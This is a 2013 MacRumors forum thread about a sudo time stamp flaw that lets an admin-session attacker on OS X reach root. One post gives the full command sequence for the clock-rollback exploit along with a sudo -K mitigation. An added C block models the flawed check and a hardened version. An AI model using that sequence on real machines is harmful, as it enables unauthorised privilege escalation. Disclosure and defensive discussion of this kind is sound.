Old Aug 28, 2013, 09:03 PM   #1
MacRumors
macrumors bot
 
Join Date: Apr 2001
OS X Vulnerability Can Allow Superuser Access to Unauthorized Users




Users looking to exploit a vulnerability in the Sudo Unix command, originally reported back in March, have received some assistance, reports Ars Technica.

The developers of Metasploit, software that makes it easier to misuse vulnerabilities in operating systems and applications, have added the Sudo vulnerability to their software suite. All versions of OS X from OS X Lion 10.7 through the current Mountain Lion 10.8.4 remain vulnerable.
Quote:
Mac users should realize that an attacker must satisfy a variety of conditions before being able to exploit this vulnerability. For one, the end-user who is logged in must already have administrator privileges. And for another, the user must have successfully run sudo at least once in the past. And of course, the attacker must already have either physical or remote shell access to the target machine. In other words: this exploit can't be used in the kind of drive-by webpage attacks that last year infected some 650,000 Macs with the Flashback malware. This doesn't mean it's a non-issue though, since the exploit can be used in concert with other attacks to magnify the damage they can do.
Most of the recent exploits in Mac OS X have been related to Java, which Apple completely blocked earlier this year over security vulnerabilities, though Apple did release a standalone malware removal tool to help clean machines that were affected by a number of Java vulnerabilities.

OS X has been targeted more in recent years as it has gained in popularity. The Janicab.A malware was discovered last month, while another program called macs.app was discovered in May. That app captured and stored screenshots.

Article Link: OS X Vulnerability Can Allow Superuser Access to Unauthorized Users
MacRumors is offline   0 Reply With Quote
Old Aug 28, 2013, 09:12 PM   #2
BuCkDoG
macrumors regular
 
Join Date: Jun 2013
Interesting. Let's hope they patch this soon.
__________________
15" Retina MacBook Pro 2.7 Intel i7 16GB RAM 512 SSD
iPad 3 16GB WiFi + 3G White
iPhone 6 16GB Space Gray
BuCkDoG is offline   5 Reply With Quote
Old Aug 28, 2013, 09:26 PM   #3
tsadi
macrumors member
 
Join Date: Feb 2011
"For one, the end-user who is logged in must already have administrator privileges. And for another, the user must have successfully run sudo at least once in the past."

I'm not too sure why a user who already has admin access would bother using an exploit to gain admin privilege - an access level he already has.
tsadi is offline   4 Reply With Quote
Old Aug 28, 2013, 09:31 PM   #4
Dalton63841
macrumors 65816
 
Join Date: Nov 2010
Location: SEMO, USA
Quote:
Originally Posted by tsadi View Post
"For one, the end-user who is logged in must already have administrator privileges. And for another, the user must have successfully run sudo at least once in the past."

I'm not too sure why a user who already has admin access would bother using an exploit to gain admin privilege - an access level he already has.
What it is saying is that if an attacker already has access to your machine, AND you are on an administrator account, AND you have opened Terminal and used sudo, THEN they could maybe gain root access to your account.
__________________
mid-2009 13" Macbook Pro, 2.26Ghz, 8GB RAM, 120GB SSD + 1TB HDD
Dalton63841 is offline   6 Reply With Quote
Old Aug 28, 2013, 09:31 PM   #5
bondsbw
macrumors member
 
Join Date: Sep 2006
Quote:
Originally Posted by tsadi View Post
I'm not too sure why a user who already has admin access would bother using an exploit to gain admin privilege - an access level he already has.
I was confused about this too. The summary doesn't go into much detail, and the title can be misread/is confusing. Does it mean that unauthorized users can somehow gain root? Is it an exploit that is possible when one logged-in user has root access and another logged-in remote or physical user has some level of shell access (e.g. via guest account or via low-privileged user account)?
bondsbw is offline   2 Reply With Quote
Old Aug 28, 2013, 09:33 PM   #6
pdjudd
macrumors 68040
 
Join Date: Jun 2007
Location: Plymouth, MN
Quote:
Originally Posted by tsadi View Post
I'm not too sure why a user who already has admin access would bother using an exploit to gain admin privilege - an access level he already has.
Admin and root are two different levels of access. You can do some things with root that you cannot do with admin. Root is the deepest access one can have - but it's not really the goal of most hackers. An administrator account is probably the most that an attacker really needs since they can pretty much do anything they need with that account.

So an exploit that needs admin rights access and one that requires you to have used sudo isn't one that is high priority. The number of users that run sudo at all is really small, and from a security standpoint, if you have admin rights, all security goes out the window. In other words, you don't have security.
pdjudd is offline   8 Reply With Quote
Old Aug 28, 2013, 09:34 PM   #7
sjinsjca
macrumors 68000
 
Join Date: Oct 2008
Quote:
Originally Posted by tsadi View Post
I'm not too sure why a user who already has admin access would bother using an exploit to gain admin privilege - an access level he already has.
Admin != root
sjinsjca is offline   8 Reply With Quote
Old Aug 28, 2013, 09:39 PM   #8
jameslmoser
macrumors 6502
 
Join Date: Sep 2011
I know a lot of mac users, and only one other person I know of has ever used sudo. We are both sysadmins/programmers. It also seems like if the attacker already has shell access to your machine, then either they already have an account on the machine (probably someone the machine owner knows) or they already used another exploit to get to this point. I don't see this as a major concern, but obviously it should be fixed.

----------

Quote:
Originally Posted by Dalton63841 View Post
What it is saying is that if an attacker already has access to your machine, AND you are on an administrator account, AND you have opened Terminal and used sudo, THEN they could maybe gain root access to your account.
That's a lot of if/ands... =)
jameslmoser is offline   1 Reply With Quote
Old Aug 28, 2013, 09:48 PM   #9
goobot
macrumors 601
 
Join Date: Jun 2009
Location: long island NY
Quote:
Originally Posted by jameslmoser View Post
I know a lot of mac users, and only one other person I know of has ever used sudo. We are both sysadmins/programmers. It also seems like if the attacker already has shell access to your machine, then either they already have an account on the machine (probably someone the machine owner knows) or they already used another exploit to get to this point. I don't see this as a major concern, but obviously it should be fixed.
Lots of people have their mac set up to login to their account automatically on boot. Also if you steal someone's computer when it is in sleep mode and still logged in there you go.
__________________
Unibody Macbook |iPad|Apple TV 2|Black iPhone 6
goobot is offline   1 Reply With Quote
Old Aug 28, 2013, 09:48 PM   #10
ururk
macrumors newbie
 
Join Date: Jun 2007
Hrm. So, I had a machine once where I was an administrator, but not in the sudoers file. Fine - so I unlocked it and added myself via BBEdit. However, permissions were incorrect after updating the file, so sudo was "broken" on the machine. As an experiment, I used Disk Utility's repair permissions tool - and sure enough it fixed the sudoers file permissions, and I then had sudo access.

I know what I describe above is probably expected behavior, but it made me rethink how secure I thought OS X was.
ururk is offline   0 Reply With Quote
Old Aug 28, 2013, 09:48 PM   #11
Dalton63841
macrumors 65816
 
Join Date: Nov 2010
Location: SEMO, USA
Quote:
Originally Posted by jameslmoser View Post

That's a lot of if/ands... =)
Exactly. It's effectively a NON-issue, especially considering that the garden variety Mac user has never even opened Terminal. That having been said it still needs to be fixed. Who knows what fancy method they might find to exploit it if they don't fix it.
__________________
mid-2009 13" Macbook Pro, 2.26Ghz, 8GB RAM, 120GB SSD + 1TB HDD
Dalton63841 is offline   1 Reply With Quote
Old Aug 28, 2013, 09:52 PM   #12
batchtaster
macrumors 6502a
 
Join Date: Mar 2008
Since this is a "flaw" (to the extent it has been described) in sudo, it's not Mac-specific. Other flavors of UNIX are also affected. But it's more fun and gets more hits and attention when you call it an "OS X Vulnerability", as if it's Apple's mistake or fault and not due to an issue (if that's what it is) in one of several hundred non-Apple projects.
batchtaster is offline   10 Reply With Quote
Old Aug 28, 2013, 09:53 PM   #13
RabidMacFan
macrumors regular
 
Join Date: Jun 2012
Location: California
You don't need to run metasploit to exploit this bug.

The following command should give you root if you are logged in to OS X as an Administrator and have used the "sudo" command at least once in the past. It will also set your system clock to 01/01/1970.

Code:
sudo -k
systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00
sudo su
To set your system clock back to normal, go into the System Preferences and set the time and time zone back to the way it was.

To prevent somebody from abusing this attack, you will need to run the following command after every time you use the sudo command, until it gets patched.
Code:
sudo -K
RabidMacFan is offline   6 Reply With Quote
Old Aug 28, 2013, 09:55 PM   #14
Dalton63841
macrumors 65816
 
Join Date: Nov 2010
Location: SEMO, USA
Quote:
Originally Posted by batchtaster View Post
Since this is a "flaw" (to the extent it has been described) in sudo, it's not Mac-specific. Other flavors of UNIX are also affected. But it's more fun and gets more hits and attention when you call it an "OS X Vulnerability", as if it's Apple's mistake or fault and not due to an issue (if that's what it is) in one of several hundred non-Apple projects.
From the original article:

Quote:
The addition capitalizes on the fact that all versions of OS X from 10.7 through the current 10.8.4 remain vulnerable. While the bug also affected many Linux distributions, most of those require a root password to change the computer clock. Macs impose no such restrictions on clock changes thanks to the systemsetup binary.
__________________
mid-2009 13" Macbook Pro, 2.26Ghz, 8GB RAM, 120GB SSD + 1TB HDD
Dalton63841 is offline   5 Reply With Quote
Old Aug 28, 2013, 09:58 PM   #15
manu chao
macrumors 68020
 
Join Date: Jul 2003
Quote:
Originally Posted by batchtaster View Post
Since this is a "flaw" (to the extent it has been described) in sudo, it's not Mac-specific. Other flavors of UNIX are also affected. But it's more fun and gets more hits and attention when you call it an "OS X Vulnerability", as if it's Apple's mistake or fault and not due to an issue (if that's what it is) in one of several hundred non-Apple projects.
It's an OS X vulnerability if other Unix versions have long patched it in their current releases. The patch is there already, a Unix OS vendor just has to incorporate it.

Last edited by manu chao; Aug 28, 2013 at 10:05 PM.
manu chao is offline   0 Reply With Quote
Old Aug 28, 2013, 10:02 PM   #16
RabidMacFan
macrumors regular
 
Join Date: Jun 2012
Location: California
Quote:
Originally Posted by batchtaster View Post
Since this is a "flaw" (to the extent it has been described) in sudo, it's not Mac-specific. Other flavors of UNIX are also affected. But it's more fun and gets more hits and attention when you call it an "OS X Vulnerability", as if it's Apple's mistake or fault and not due to an issue (if that's what it is) in one of several hundred non-Apple projects.
It's an OS X vulnerability because sudo is built into OS X. The copy of sudo that is installed is outdated (1.7.4p6) and has known vulnerabilities. The latest version of the release branch is 1.7.10p7, released on February 27, 2013.

OS X inherits any vulnerabilities within the software that it ships with, just like Windows or Linux would inherit any vulnerabilities in software they ship with. It may not be Mac-specific, but it definitely is an OS X vulnerability.

Last edited by RabidMacFan; Aug 28, 2013 at 11:59 PM. Reason: latest version of sudo is 1.7.10p7, not 1.7.4p7
RabidMacFan is offline   1 Reply With Quote
Old Aug 28, 2013, 10:04 PM   #17
brymck
macrumors newbie
 
Join Date: Jul 2012
Location: Tokyo, Japan
Interesting.

Just so it's clear, sudo ("superuser do") creates a timestamp file so you can continue running commands with superuser privileges. With sudo -k, you can reset the timestamp file to point to the beginning of Unix time (1/1/1970). If you can reset the system clock as well, then you can therefore run commands with sudo as though you had just run it. In OSX you can reset the system clock with systemsetup, which apparently (I can't check right now) does not require administrator perms unlike most Linux distributions, hence it being an OSX vulnerability.

You need access to the computer in the first place, which probably limits the effectiveness of the exploit, but it's still a pretty ugly one with what I'd think is an obvious fix (test newer versions of sudo and update users or require higher permissions to change the system clock).
brymck is offline   1 Reply With Quote
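Added example, not part of any post in this thread and not sudo's own source: a simplified C model of the time stamp check brymck describes, beside a hardened variant, showing why the `sudo -K` mitigation from RabidMacFan's post (which removes the time stamp) holds up where `sudo -k` (which resets it to the epoch) does not. The struct, the function names, the 5-minute timeout and the sample times are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stdio.h>
#include <time.h>

/* Assumption: a 5-minute grace period, sudo's usual default. */
#define TIMEOUT_SECS (5 * 60)

/* Simplified stand-in for a user's time stamp file (not sudo's real layout). */
struct ts_record {
    bool   exists;  /* false once `sudo -K` has removed the file       */
    time_t mtime;   /* 0 once `sudo -k` has reset it to the Unix epoch */
};

void sudo_k(struct ts_record *ts) { if (ts->exists) ts->mtime = 0; }
void sudo_K(struct ts_record *ts) { ts->exists = false; ts->mtime = 0; }

/* Vulnerable model: any record younger than the timeout counts as a
 * recent authentication, so the result depends entirely on the clock. */
bool ts_valid_vulnerable(const struct ts_record *ts, time_t now)
{
    if (!ts->exists)
        return false;
    return now >= ts->mtime && now - ts->mtime < TIMEOUT_SECS;
}

/* Hardened model: an epoch-valued stamp means "invalidated" and is never
 * accepted, whatever the system clock says. */
bool ts_valid_hardened(const struct ts_record *ts, time_t now)
{
    if (!ts->exists || ts->mtime == 0)
        return false;
    return now >= ts->mtime && now - ts->mtime < TIMEOUT_SECS;
}

int main(void)
{
    const time_t auth_time = 1377741600;  /* constructed sample time */
    const time_t rolled_back = 60;        /* clock set to just after the epoch */
    struct ts_record ts = { true, auth_time };

    sudo_k(&ts);
    printf("after -k, real clock:        vulnerable=%d hardened=%d\n",
           ts_valid_vulnerable(&ts, auth_time + 3600),
           ts_valid_hardened(&ts, auth_time + 3600));
    printf("after -k, clock rolled back: vulnerable=%d hardened=%d\n",
           ts_valid_vulnerable(&ts, rolled_back),
           ts_valid_hardened(&ts, rolled_back));

    sudo_K(&ts);
    printf("after -K, clock rolled back: vulnerable=%d hardened=%d\n",
           ts_valid_vulnerable(&ts, rolled_back),
           ts_valid_hardened(&ts, rolled_back));
    return 0;
}
```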
Old Aug 28, 2013, 10:05 PM   #18
manu chao
macrumors 68020
 
Join Date: Jul 2003
Quote:
Originally Posted by Dalton63841 View Post
Exactly. It's effectively a NON-issue, especially considering that the garden variety Mac user has never even opened Terminal. That having been said it still needs to be fixed. Who knows what fancy method they might find to exploit it if they don't fix it.
It's very simple, when somebody manages to run code in your account (e.g., you clicked on a downloaded file which was actually an application and you ignored the warning or an application you downloaded had a payload) they don't have access yet to settings like the firewall or deleting accounts or install and run some very low level stuff. They still need an admin password, well thanks to this exploit they don't need it anymore.

But I wonder if the malicious code could not simply install a keylogger to eventually get your password? Or do you need an admin password to install a keylogger.
manu chao is offline   1 Reply With Quote
Old Aug 28, 2013, 10:05 PM   #19
pdjudd
macrumors 68040
 
Join Date: Jun 2007
Location: Plymouth, MN
Quote:
Originally Posted by goobot View Post
Lots of people have their mac set up to login to their account automatically on boot. Also if you steal someone's computer when it is in sleep mode and still logged in there you go.
If someone can get physical access to your hardware you can kiss any security in mind unless your drive is encrypted (which will require a password anyhow).

I still fail to see how this is worse.

If someone has admin access, and you lose your laptop or it's stolen - you're screwed even before this path could be exploited.
pdjudd is offline   1 Reply With Quote
Old Aug 28, 2013, 10:06 PM   #20
brymck
macrumors newbie
 
Join Date: Jul 2012
Location: Tokyo, Japan
Quote:
Originally Posted by RabidMacFan View Post
OS X inherits any vulnerabilities within the software that it ships with, just like Windows or Linux would inherit any vulnerabilities in software they ship with. It may not be Mac-specific, but it definitely is an OS X vulnerability.
I think you know this already, but just so it's clear, it's actually more Mac-specific than that, because many Linux distributions require sudo in the first place to change the system clock. OS X doesn't. So while Linux distros have updated sudo, they haven't needed to with the same urgency. OS X, meanwhile, needs an update but hasn't had one. The vulnerability is really a combination of sudo and OS X's permission structure for system clock changes.

As the Ars Technica article notes:

Quote:
While the bug also affected many Linux distributions, most of those require a root password to change the computer clock. Macs impose no such restrictions on clock changes thanks to the systemsetup binary.

Last edited by brymck; Aug 28, 2013 at 10:12 PM.
brymck is offline   0 Reply With Quote
Old Aug 28, 2013, 10:07 PM   #21
charlituna
macrumors G3
 
Join Date: Jun 2008
Location: Los Angeles, CA
Quote:
Originally Posted by Dalton63841 View Post
What it is saying is that if an attacker already has access to your machine, AND you are on an administrator account, AND you have opened Terminal and used sudo, THEN they could maybe gain root access to your account.
So the 'patch' is to be mindful of who has access to your computer
__________________
Return of the Non Tech's Wish List
(She's family so I'm biased )
charlituna is offline   1 Reply With Quote
Old Aug 28, 2013, 10:10 PM   #22
mikethebigo
macrumors 68000
 
Join Date: May 2009
Sudo make me a sandwich.
mikethebigo is offline   6 Reply With Quote
Old Aug 28, 2013, 10:13 PM   #23
Four oF NINE
macrumors 65816
 
Join Date: Sep 2011
Location: Soviet Union
I'm not sure I even understand this particular vulnerability. Is this something that can be executed remotely or does someone require physical access to the machine?

Are there any user steps that can preempt this particular vulnerability?
__________________
13 inch 2012 MBP SSD Gold & White iPhone 5S 64gb, Yellow iPhone 5C 2 Apple TVs White iPad Air & iPad Mini Airport Time Capsule & Airport Extreme iPod classic and iPod shuffle
Four oF NINE is offline   0 Reply With Quote
Old Aug 28, 2013, 10:14 PM   #24
ScottishCaptain
macrumors 6502a
 
Join Date: Oct 2008
Quote:
Originally Posted by mikethebigo View Post
Sudo make me a sandwich.
make: *** No rule to make target `me'. Stop.

-SC
__________________
2010 Mac Pro (MacPro5,1), 2*2.93ghz, 64GB, 4x2TB, Apple RAID Card, 5970 GPU, 2xSD, Eizo CG276W
ScottishCaptain is offline   2 Reply With Quote
Old Aug 28, 2013, 10:22 PM   #25
V.K.
macrumors 6502
 
Join Date: Dec 2007
Location: Toronto, Canada
EDIT: mea culpa, I was wrong. this is a real vulnerability that needs to be fixed.

Last edited by V.K.; Aug 29, 2013 at 12:05 AM.
V.K. is offline   0 Reply With Quote


All times are GMT -5. The time now is 10:37 AM.

Copyright 2002-2013, MacRumors.com, LLC